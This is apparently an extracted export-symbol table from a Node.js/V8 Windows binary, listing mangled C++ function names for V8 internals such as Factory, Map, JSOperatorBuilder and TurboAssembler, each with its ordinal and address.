                                  ?CopyCode@Factory@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@23@V423@@Z40530x140944b90
                                  ?CopyCodePages@Isolate@v8@@QEAA_K_KPEAUMemoryRange@2@@Z40540x140a7fc70
                                  ?CopyContents@ArrayBufferView@v8@@QEAA_KPEAX_K@Z40550x140a7fd00
                                  ?CopyEnumKeysTo@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VGlobalDictionary@internal@v8@@@23@V?$Handle@VFixedArray@internal@v8@@@23@W4KeyCollectionMode@23@PEAVKeyAccumulator@23@@Z40560x140771fb0
                                  ?CopyEnumKeysTo@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VNameDictionary@internal@v8@@@23@V?$Handle@VFixedArray@internal@v8@@@23@W4KeyCollectionMode@23@PEAVKeyAccumulator@23@@Z40570x1407721c0
                                  ?CopyFixedArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@@Z40580x140944e30
                                  ?CopyFixedArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@H@Z40590x140944ee0
                                  ?CopyFixedArrayUpTo@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@HW4AllocationType@23@@Z40600x140945020
                                  ?CopyFixedArrayWithMap@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@V?$Handle@VMap@internal@v8@@@23@@Z40610x140945150
                                  ?CopyFixedDoubleArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedDoubleArray@internal@v8@@@23@V423@@Z40620x140945170
                                  ?CopyForPreventExtensions@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@W4PropertyAttributes@23@V?$Handle@VSymbol@internal@v8@@@23@PEBD_N@Z40630x1407905f0
                                  ?CopyFrom@BitVector@internal@v8@@AEAAXTDataStorage@123@H@Z40640x1404536f0
                                  ?CopyFrom@BitVector@internal@v8@@QEAAXAEBV123@@Z40650x1404537b0
                                  ?CopyGlobal@GlobalHandles@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEA_K@Z40660x140964df0
                                  ?CopyGlobalReference@V8@v8@@CAPEA_KPEA_K@Z40670x140a7fe10
                                  ?CopyInitialMap@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@HHH@Z40680x140790830
                                  ?CopyInsertDescriptor@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@PEAVDescriptor@23@W4TransitionFlag@23@@Z40690x140790960
                                  ?CopyJSObject@Factory@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@23@V423@@Z40700x140945200
                                  ?CopyJSObjectWithAllocationSite@Factory@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@23@V423@V?$Handle@VAllocationSite@internal@v8@@@23@@Z40710x140945220
                                  ?CopyPropertyArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VPropertyArray@internal@v8@@@23@V423@H@Z40720x1409457d0
                                  ?CopyTo@FixedArray@internal@v8@@QEBAXHV123@HH@Z40730x1407725d0
                                  ?CopyToHeap@ByteData@PreparseDataBuilder@internal@v8@@QEAA?AV?$Handle@VPreparseData@internal@v8@@@34@PEAVIsolate@34@H@Z40740x140725050
                                  ?CopyToOffThreadHeap@ByteData@PreparseDataBuilder@internal@v8@@QEAA?AV?$Handle@VPreparseData@internal@v8@@@34@PEAVOffThreadIsolate@34@H@Z40750x1407250a0
                                  ?CopyToZone@ByteData@PreparseDataBuilder@internal@v8@@QEAAPEAVZonePreparseData@34@PEAVZone@34@H@Z40760x1407250f0
                                  ?CopyTracedGlobal@GlobalHandles@internal@v8@@SAXPEBQEB_KPEAPEA_K@Z40770x140964e30
                                  ?CopyTracedGlobalReference@V8@v8@@CAXPEBQEB_KPEAPEA_K@Z40780x140a7fe30
                                  ?CopyWasmMemory@BackingStore@internal@v8@@QEAA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_K@Z40790x14083eb10
                                  ?CopyWeakArrayListAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VWeakArrayList@internal@v8@@@23@V423@HW4AllocationType@23@@Z40800x140945910
                                  ?CopyWeakFixedArrayAndGrow@Factory@internal@v8@@QEAA?AV?$Handle@VWeakFixedArray@internal@v8@@@23@V423@H@Z40810x140945a00
                                  ?CopyWithConstant@Map@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@W4TransitionFlag@23@@Z40820x140790f30
                                  ?CopyWithField@Map@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VFieldType@internal@v8@@@23@W4PropertyAttributes@23@W4PropertyConstness@23@VRepresentation@23@W4TransitionFlag@23@@Z40830x140791060
                                  ?CorrectCurrentCounterId@RuntimeCallStats@internal@v8@@QEAAXW4RuntimeCallCounterId@23@W4CounterMode@123@@Z40840x140855580
                                  ?Count@BitVector@internal@v8@@QEBAHXZ40850x1405f3b30
                                  ?Count@BlockData@Coverage@debug@v8@@QEBAIXZ40860x140a7fe40
                                  ?Count@FunctionData@Coverage@debug@v8@@QEBAIXZ40870x140a7fe40
                                  ?CountTotalPages@PagedSpace@internal@v8@@QEAAHXZ40880x1408d2170
                                  ?CountUsage@Isolate@internal@v8@@QEAAXW4UseCounterFeature@13@@Z40890x14097c960
                                  ?CountUsage@Parser@internal@v8@@AEAAXW4UseCounterFeature@Isolate@3@@Z40900x1406fa380
                                  ?Covers@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z40910x140ef5fb0
                                  ?Create@ArrayBufferAllocator@node@@SA?AV?$unique_ptr@VArrayBufferAllocator@node@@U?$default_delete@VArrayBufferAllocator@node@@@std@@@std@@_N@Z40920x140248c40
                                  ?Create@EternalHandles@internal@v8@@QEAAXPEAVIsolate@23@VObject@23@PEAH@Z40930x140964ef0
                                  ?Create@ExternalReference@internal@v8@@SA?AV123@_K@Z40940x140076a70
                                  ?Create@GCEntryCreateTrait@CodeEntry@internal@v8@@SAPEAV234@XZ40950x1406d52f0
                                  ?Create@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@@Z40960x140964ff0
                                  ?Create@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@_K@Z40970x1409651d0
                                  ?Create@IdleEntryCreateTrait@CodeEntry@internal@v8@@SAPEAV234@XZ40980x1406d5340
                                  ?Create@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40990x140eac860
                                  ?Create@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@H@Z41000x140791270
                                  ?Create@MultiIsolatePlatform@node@@SA?AV?$unique_ptr@VMultiIsolatePlatform@node@@U?$default_delete@VMultiIsolatePlatform@node@@@std@@@std@@HPEAVTracingController@v8@@@Z41010x140248d90
                                  ?Create@ProgramEntryCreateTrait@CodeEntry@internal@v8@@SAPEAV234@XZ41020x1406d5390
                                  ?Create@RootEntryCreateTrait@CodeEntry@internal@v8@@SAPEAV234@XZ41030x1406d53e0
                                  ?Create@StackTraceIterator@debug@v8@@SA?AV?$unique_ptr@VStackTraceIterator@debug@v8@@U?$default_delete@VStackTraceIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@H@Z41040x1409c7fa0
                                  ?Create@TracedValue@tracing@v8@@SA?AV?$unique_ptr@VTracedValue@tracing@v8@@U?$default_delete@VTracedValue@tracing@v8@@@std@@@std@@XZ41050x1405f5620
                                  ?Create@UnresolvedEntryCreateTrait@CodeEntry@internal@v8@@SAPEAV234@XZ41060x1406d5430
                                  ?CreateAndSetEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ41070x14097c9f0
                                  ?CreateArguments@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4CreateArgumentsType@34@@Z41080x1408925f0
                                  ?CreateArguments@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z41090x140eac870
                                  ?CreateArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KV?$MaybeHandle@VAllocationSite@internal@v8@@@34@@Z41100x140eac930
                                  ?CreateArrayBufferAllocator@node@@YAPEAVArrayBufferAllocator@1@XZ41110x140248e00
                                  ?CreateArrayFromIterable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ41120x140892830
                                  ?CreateArrayFromIterable@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41130x140eaca00
                                  ?CreateArrayIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4IterationKind@34@@Z41140x140eaca90
                                  ?CreateArrayLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z41150x140892950
                                  ?CreateAsyncCompileJob@WasmEngine@wasm@internal@v8@@AEAAPEAVAsyncCompileJob@234@PEAVIsolate@34@AEBVWasmFeatures@234@V?$unique_ptr@$$BY0A@EU?$default_delete@$$BY0A@E@std@@@std@@_KV?$Handle@VContext@internal@v8@@@34@PEBDV?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@9@@Z41160x14055d860
                                  ?CreateAsyncFunctionObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z41170x140eacb50
                                  ?CreateBlackArea@Page@internal@v8@@QEAAX_K0@Z41180x1408d2190
                                  ?CreateBlob@SnapshotCreator@v8@@QEAA?AVStartupData@2@W4FunctionCodeHandling@12@@Z41190x140a7fe50
                                  ?CreateBlockContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@@Z41200x140892af0
                                  ?CreateBlockContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VScopeInfo@internal@v8@@@34@@Z41210x140eacc10
                                  ?CreateBoundFunction@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KV?$Handle@VMap@internal@v8@@@34@@Z41220x140eaccd0
                                  ?CreateBreakInfo@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z41230x1409bf4e0
                                  ?CreateCaptureNameMap@RegExpParser@internal@v8@@AEAA?AV?$Handle@VFixedArray@internal@v8@@@23@XZ41240x1406a9a00
                                  ?CreateCatchContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVScope@34@@Z41250x140892c40
                                  ?CreateCatchContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VScopeInfo@internal@v8@@@34@@Z41260x140eacda0
                                  ?CreateClassFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z41270x140945b40
                                  ?CreateClosure@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z41280x140892e00
                                  ?CreateClosure@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Handle@VSharedFunctionInfo@internal@v8@@@34@V?$Handle@VFeedbackCell@internal@v8@@@34@V?$Handle@VCode@internal@v8@@@34@W4AllocationType@34@@Z41290x140eace60
                                  ?CreateClosureFromBuiltinSharedFunctionInfo@JSCallReducer@compiler@internal@v8@@AEAAPEAVNode@234@VSharedFunctionInfoRef@234@PEAV5234@11@Z41300x140f40100
                                  ?CreateCodeCache@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VUnboundModuleScript@v8@@@2@@Z41310x140a809b0
                                  ?CreateCodeCache@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VUnboundScript@v8@@@2@@Z41320x140a809b0
                                  ?CreateCodeCacheForFunction@ScriptCompiler@v8@@SAPEAUCachedData@12@V?$Local@VFunction@v8@@@2@@Z41330x140a809c0
                                  ?CreateCollectionIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CollectionKind@34@W4IterationKind@34@@Z41340x140eacf30
                                  ?CreateCompilationEnv@NativeModule@wasm@internal@v8@@QEBA?AUCompilationEnv@234@XZ41350x14056f100
                                  ?CreateContextWorklists@MarkingWorklistsHolder@internal@v8@@QEAAXAEBV?$vector@_KV?$allocator@_K@std@@@std@@@Z41360x1408ef730
                                  ?CreateDataProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@IV?$Local@VValue@v8@@@2@@Z41370x140a80a60
                                  ?CreateDataProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@V?$Local@VValue@v8@@@2@@Z41380x140a80d00
                                  ?CreateDelayedStringConstant@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEBVStringConstantBase@34@PEAVNode@234@@Z41390x140f7fe50
                                  ?CreateEmptyArrayLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z41400x140892fa0
                                  ?CreateEmptyJumpTableInRegion@NativeModule@wasm@internal@v8@@AEAAPEAVWasmCode@234@HVAddressRegion@base@4@AEBVOptionalLock@WasmCodeAllocator@234@@Z41410x14056f180
                                  ?CreateEmptyLiteralArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41420x140ead010
                                  ?CreateEmptyLiteralObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41430x140ead0d0
                                  ?CreateEmptyObjectLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ41440x1408930f0
                                  ?CreateEntriesForRuntimeCallStats@ProfilerCodeObserver@internal@v8@@AEAAXXZ41450x1406e77c0
                                  ?CreateEnvironment@node@@YAPEAVEnvironment@1@PEAVIsolateData@1@V?$Local@VContext@v8@@@v8@@AEBV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@2W4Flags@EnvironmentFlags@1@UThreadId@1@V?$unique_ptr@UInspectorParentHandle@node@@U?$default_delete@UInspectorParentHandle@node@@@std@@@7@@Z41460x140248e40
                                  ?CreateEnvironment@node@@YAPEAVEnvironment@1@PEAVIsolateData@1@V?$Local@VContext@v8@@@v8@@HPEBQEBDH2@Z41470x140248f60
                                  ?CreateEvalContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@H@Z41480x1408931f0
                                  ?CreateFillerObjectAt@Heap@internal@v8@@CA?AVHeapObject@23@VReadOnlyRoots@23@_KHW4ClearFreedMemoryMode@23@@Z41490x14092cb40
                                  ?CreateFillerObjectAt@Heap@internal@v8@@QEAA?AVHeapObject@23@_KHW4ClearRecordedSlots@23@@Z41500x14092cb60
                                  ?CreateFillerObjectAt@OffThreadHeap@internal@v8@@QEAA?AVHeapObject@23@_KHW4ClearFreedMemoryMode@23@@Z41510x1408e3620
                                  ?CreateForEachStatementTDZ@Parser@internal@v8@@AEAAPEAVBlock@23@PEAV423@AEBUForInfo@?$ParserBase@VParser@internal@v8@@@23@@Z41520x14072bf20
                                  ?CreateForEmptyFunction@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@23@PEAVIsolate@23@@Z41530x1407589b0
                                  ?CreateForFunction@ScopeIterator@debug@v8@@SA?AV?$unique_ptr@VScopeIterator@debug@v8@@U?$default_delete@VScopeIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@V?$Local@VFunction@v8@@@3@@Z41540x1409cc040
                                  ?CreateForGeneratorObject@ScopeIterator@debug@v8@@SA?AV?$unique_ptr@VScopeIterator@debug@v8@@U?$default_delete@VScopeIterator@debug@v8@@@std@@@std@@PEAVIsolate@3@V?$Local@VObject@v8@@@3@@Z41550x1409cc120
                                  ?CreateFrameAccessState@CodeGenerator@compiler@internal@v8@@AEAAXPEAVFrame@234@@Z41560x140e4a420
                                  ?CreateFrameStateFunctionInfo@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVFrameStateFunctionInfo@234@W4FrameStateType@234@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@@Z41570x140e09910
                                  ?CreateFreeList@FreeList@internal@v8@@SAPEAV123@XZ41580x1408d21e0
                                  ?CreateFunctionContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVScope@34@H@Z41590x140893380
                                  ?CreateFunctionContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Handle@VScopeInfo@internal@v8@@@34@HW4ScopeType@34@@Z41600x140ead160
                                  ?CreateGeneratorObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41610x140ead220
                                  ?CreateHandle@HandleScope@v8@@KAPEA_KPEAVIsolate@internal@2@_K@Z41620x140a80f80
                                  ?CreateInitializerFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEBDPEAVDeclarationScope@23@PEAV?$ZoneList@PEAVClassLiteralProperty@internal@v8@@@23@@Z41630x14072bfd0
                                  ?CreateIsolateData@node@@YAPEAVIsolateData@1@PEAVIsolate@v8@@PEAUuv_loop_s@@PEAVMultiIsolatePlatform@1@PEAVArrayBufferAllocator@1@@Z41640x1402491e0
                                  ?CreateIterResultObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41650x140ead2b0
                                  ?CreateKeyValueArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41660x140ead2c0
                                  ?CreateLiteralArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Handle@VArrayBoilerplateDescription@internal@v8@@@34@AEBUFeedbackSource@234@HH@Z41670x140ead2d0
                                  ?CreateLiteralObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Handle@VObjectBoilerplateDescription@internal@v8@@@34@AEBUFeedbackSource@234@HH@Z41680x140ead3b0
                                  ?CreateLiteralRegExp@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Handle@VString@internal@v8@@@34@AEBUFeedbackSource@234@H@Z41690x140ead490
                                  ?CreateMaterializedEquivalent@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@@Z41700x140870de0
                                  ?CreateMessage@Exception@v8@@SA?AV?$Local@VMessage@v8@@@2@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z41710x140a80fc0
                                  ?CreateMessage@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVMessageLocation@23@@Z41720x14097cc80
                                  ?CreateMessageOrAbort@Isolate@internal@v8@@QEAA?AV?$Handle@VJSMessageObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVMessageLocation@23@@Z41730x14097cdc0
                                  ?CreateNamedCaptureAtIndex@RegExpParser@internal@v8@@AEAA_NPEBV?$ZoneVector@G@23@H@Z41740x1406a9be0
                                  ?CreateNewBuffer@StreamingDecoder@wasm@internal@v8@@AEAAPEAVSectionBuffer@1234@IE_KV?$Vector@$$CBE@34@@Z41750x140574570
                                  ?CreateNodeFromPredecessors@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVNode@234@AEBV?$vector@PEAVBasicBlock@compiler@internal@v8@@V?$allocator@PEAVBasicBlock@compiler@internal@v8@@@std@@@std@@AEBV?$vector@PEAVNode@compiler@internal@v8@@V?$allocator@PEAVNode@compiler@internal@v8@@@std@@@7@PEBVOperator@234@1@Z41760x140ee1d30
                                  ?CreateObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41770x140ead560
                                  ?CreateObjectLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KHH@Z41780x140893510
                                  ?CreatePlatform@node@@YAPEAVMultiIsolatePlatform@1@HPEAVTracingController@tracing@1@@Z41790x140249250
                                  ?CreatePlatform@node@@YAPEAVMultiIsolatePlatform@1@HPEAVTracingController@v8@@@Z41800x140249250
                                  ?CreatePrivateNameVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEAVClassScope@23@W4VariableMode@23@W4IsStaticFlag@23@PEBVAstRawString@23@@Z41810x14072c210
                                  ?CreatePromise@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41820x140ead570
                                  ?CreateRange@TypeCache@compiler@internal@v8@@AEAA?AVType@234@NN@Z41830x140e8cd30
                                  ?CreateRegExpLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEBVAstRawString@34@HH@Z41840x1408936b0
                                  ?CreateReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AW4OperandSize@234@XZ41850x14086e100
                                  ?CreateSloppyFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4FunctionMode@23@V?$MaybeHandle@VJSFunction@internal@v8@@@23@@Z41860x140945c90
                                  ?CreateSnapshotDataBlobInternal@internal@v8@@YA?AVStartupData@2@W4FunctionCodeHandling@SnapshotCreator@2@PEBDPEAVIsolate@2@@Z41870x140601d50
                                  ?CreateStrictFunctionMap@Factory@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@W4FunctionMode@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z41880x140945f00
                                  ?CreateStringIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41890x140ead580
                                  ?CreateSyntheticContextVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEBVAstRawString@23@@Z41900x14072c2e0
                                  ?CreateSyntheticModule@Module@v8@@SA?AV?$Local@VModule@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@AEBV?$vector@V?$Local@VString@v8@@@v8@@V?$allocator@V?$Local@VString@v8@@@v8@@@std@@@std@@P6A?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V32@@Z@Z41910x140a810e0
                                  ?CreateThreadLocalKey@Thread@base@v8@@SAHXZ41920x140dc06a0
                                  ?CreateTimezoneCache@OS@base@v8@@SAPEAVTimezoneCache@23@XZ41930x140dc06b0
                                  ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@PEA_K_N2@Z41940x1409651f0
                                  ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@VObject@23@PEA_K_N@Z41950x140965530
                                  ?CreateTraced@GlobalHandles@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@_KPEA_K_N@Z41960x1409655a0
                                  ?CreateTypedArray@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41970x140ead590
                                  ?CreateWithContext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVScope@34@@Z41980x140893840
                                  ?CreateWithContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VScopeInfo@internal@v8@@@34@@Z41990x140ead5a0
                                  ?CreationContext@Object@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ42000x140a81290
                                  ?CreationContext@Object@v8@@SA?AV?$Local@VContext@v8@@@2@AEBV?$PersistentBase@VObject@v8@@@2@@Z42010x140076ba0
                                  ?Current@Isolate@internal@v8@@SAPEAV123@XZ42020x1404221b0
                                  ?CurrentAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ42030x14093fc30
                                  ?CurrentBlock@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@XZ42040x14027f5c0
                                  ?CurrentEmbeddedBlob@Isolate@internal@v8@@SAPEBEXZ42050x14097ce80
                                  ?CurrentEmbeddedBlobIsBinaryEmbedded@Isolate@internal@v8@@SA_NXZ42060x14097ce90
                                  ?CurrentEmbeddedBlobSize@Isolate@internal@v8@@SAIXZ42070x14097ceb0
                                  ?CurrentEmbedderAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ42080x14093fc70
                                  ?CurrentFrameCount@Debug@internal@v8@@AEAAHXZ42090x1409bf650
                                  ?CurrentLiteralAsCString@Scanner@internal@v8@@QEBAPEBDPEAVZone@23@@Z42100x1406ead60
                                  ?CurrentMarkCompactMutatorUtilization@GCTracer@internal@v8@@QEBANXZ42110x14093fc80
                                  ?CurrentMatches@Scanner@internal@v8@@QEBA_NW4Value@Token@23@@Z42120x1404221c0
                                  ?CurrentOldGenerationAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ42130x14093fc90
                                  ?CurrentPerIsolateThreadData@Isolate@internal@v8@@SAPEAVPerIsolateThreadData@123@XZ42140x1404221d0
                                  ?CurrentRawSymbol@Scanner@internal@v8@@QEBAPEBVAstRawString@23@PEAVAstValueFactory@23@@Z42150x1406eade0
                                  ?CurrentSourcePosition@BytecodeArrayBuilder@interpreter@internal@v8@@AEAA?AVBytecodeSourceInfo@234@W4Bytecode@234@@Z42160x140893a00
                                  ?CurrentStackTrace@StackTrace@v8@@SA?AV?$Local@VStackTrace@v8@@@2@PEAVIsolate@2@HW4StackTraceOptions@12@@Z42170x140a812c0
                                  ?CurrentSymbol@Scanner@internal@v8@@QEBAPEBVAstRawString@23@PEAVAstValueFactory@23@@Z42180x1406eae30
                                  ?CurrentTimeToMarkingTask@IncrementalMarking@internal@v8@@AEBANXZ42190x140920b00
                                  ?Cvtlsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42200x140498d50
                                  ?Cvtlsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42210x140498e10
                                  ?Cvtlsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42220x140498ea0
                                  ?Cvtlsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42230x140498f60
                                  ?Cvtlui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42240x140498ff0
                                  ?Cvtlui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42250x140499050
                                  ?Cvtlui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42260x140499090
                                  ?Cvtlui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42270x1404990f0
                                  ?Cvtqsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42280x140499130
                                  ?Cvtqsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42290x1404991f0
                                  ?Cvtqsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42300x140499280
                                  ?Cvtqsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42310x140499340
                                  ?Cvtqui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42320x1404993d0
                                  ?Cvtqui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42330x140499430
                                  ?Cvtqui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42340x140499580
                                  ?Cvtqui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z42350x1404995e0
                                  ?Cvtsd2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z42360x140499730
                                  ?Cvtsd2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42370x140499790
                                  ?Cvtss2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z42380x140499810
                                  ?Cvtss2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z42390x140499860
                                  ?Cvttsd2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z42400x1404998d0
                                  ?Cvttsd2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z42410x140499940
                                  ?Cvttsd2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z42420x140499990
                                  ?Cvttsd2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z42430x140499a00
                                  ?Cvttsd2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@PEAVLabel@23@@Z42440x140499a50
                                  ?Cvttsd2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@PEAVLabel@23@@Z42450x140499a80
                                  ?Cvttss2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z42460x140499a90
